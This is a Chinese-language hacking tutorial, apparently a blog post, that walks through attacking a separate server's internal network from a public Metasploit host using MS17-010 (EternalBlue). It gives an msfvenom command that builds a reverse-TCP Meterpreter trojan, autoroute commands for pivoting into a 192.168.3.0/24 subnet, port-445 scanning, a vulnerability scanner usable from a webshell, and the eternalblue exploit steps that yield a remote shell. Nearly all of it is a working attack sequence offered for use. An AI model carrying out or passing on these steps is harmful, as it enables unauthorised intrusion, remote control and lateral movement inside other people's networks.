利用公網Msf+MS17010跨網段攻擊內網(不詳細立馬關站)
前言
其實很多小白在對利用msf進行ms17010攻擊的時候總是不成功,其實這都是因為網上大部分的文章都是寫的內網對內網(192.168.1.2-->192.168.1.3)這樣的案例,今天寫了一下利用公網的MSF直接攻擊其他伺服器內網的案例。
準備工作
1.安裝了Msf的公網主機+Ubuntu系統
2.一臺其他伺服器內網存在445漏洞
3.細心,細心,細心,鑽研,鑽研!!!
開始第一步:公網主機操作
生成msf木馬:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe
Msf監聽埠:6666
可以看到,圖中獲取到了shell!
新增路由
第一步:run get_local_subnets (獲取當前路由)
第二步:run autoroute -s 192.168.3.0/24 (新增路由)
第三步:run autoroute -p (檢視已新增路由)
使用Payload進行攻擊
第一步:background(轉換到後臺)
第二步:use scanner/portscan/tcp (先掃描開放445埠的PC)
第三步:exploit(開始掃描)
.
注意:掃描出來開放了445埠的PC,不一定就存在445漏洞。(如何精準定位?)
如何列出那些存在445漏洞的PC?
描述:
工具的使用步驟如下:
解壓後在命令列下執行MS_17_010_Scan.exe,支援-ip 和-file兩種引數。
-ip引數可以指定IP掃描,同時支援IP段掃描:
MS_17_010_Scan.exe -ip 192.168.44.129
MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
-file引數支援從檔案讀取IP列表進行掃描:
MS_17_010_Scan.exe -file ip.txt
工具將顯示檢測結果:如不存在風險將顯示NOT Found Vuln,如存在風險將顯示Found Vuln MS17-010及目標電腦的作業系統版本,如果IP地址無效或者漏洞埠未開則顯示Exception。
輸出結果同時儲存在當前目錄的result.txt中。
上面的工具也可以在webshell中使用,只需要把結果輸出到 txt文件中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)
攻擊正式開始
第一步:use exploit/windows/smb/ms17_010_eternalblue(切換到攻擊模組)
第二步:set rhost 192.168.3.38(設定存在445漏洞的PC電腦IP)
第三步:exploit(執行攻擊)
第四步:攻擊完成,並且自動返回一個shell控制檯(如下圖)